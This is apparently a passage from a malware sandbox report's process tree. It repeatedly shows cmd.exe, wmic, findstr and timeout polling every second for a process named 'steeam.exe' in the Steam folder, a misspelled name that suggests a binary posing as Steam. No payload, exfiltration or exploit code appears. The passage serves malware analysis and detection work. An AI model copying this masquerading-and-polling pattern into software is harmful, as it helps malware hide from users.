PID:3444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1108

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4020

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1864

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3636

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:428

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2712

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5064

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4464

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2320

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4660

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4988

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:316

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4256

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2128

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3668

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2844

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4716

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2752

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2712

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4428

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4988

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2740

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4676

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1564

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2556

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4476

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4420

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:752

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:360

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4656

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5032

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5112

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2800

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4596

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3640

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4944

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1384

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2996

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:656

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4668

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4184

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5112

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1056

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1108

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:524

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1352

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2172

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1864

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1676

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4880

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4024

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4408

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2416

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4440

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:348

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5096

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3048

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4060

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5024

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3668

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4416

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4184

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1596

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4604

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5044

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1884

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5096

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4124

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5104

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5100

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2156

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1636

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4436

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:376

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4988

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:368

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2800

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:652

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2088

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4996

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4424

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4252

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5104

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:796

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3616

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1056

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2796

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2400

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4992

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2912

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4940

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:308

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:752

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4880

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1632

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3704

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4524

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1056

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5040

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5064

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4036

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4956

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4332

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:644

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:64

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:60

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4968

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2156

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4964

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3616

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2128

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3068

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4932

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4380

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4600

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1864

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2600

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4408

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:376

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:60

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:516

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1684

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3704

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4944

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2172

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4236

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4248

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2712

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5032

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1596

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:60

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3300

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4720

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1676

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4676

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3420

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3520

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4680

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2856

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3984

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:500

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1920

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4484

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3048

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2156

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:316

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2740

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2868

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2496

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4544

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2128

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2496

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1152

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3456

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4600

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4928

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2876

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4144

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:524

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3048

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5048

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:940

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2792

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3268

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3640

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4244

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4964

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3520

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4536

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3832

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:664

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4184

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1684

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2792

C:\Windows\system32\cmd.exe
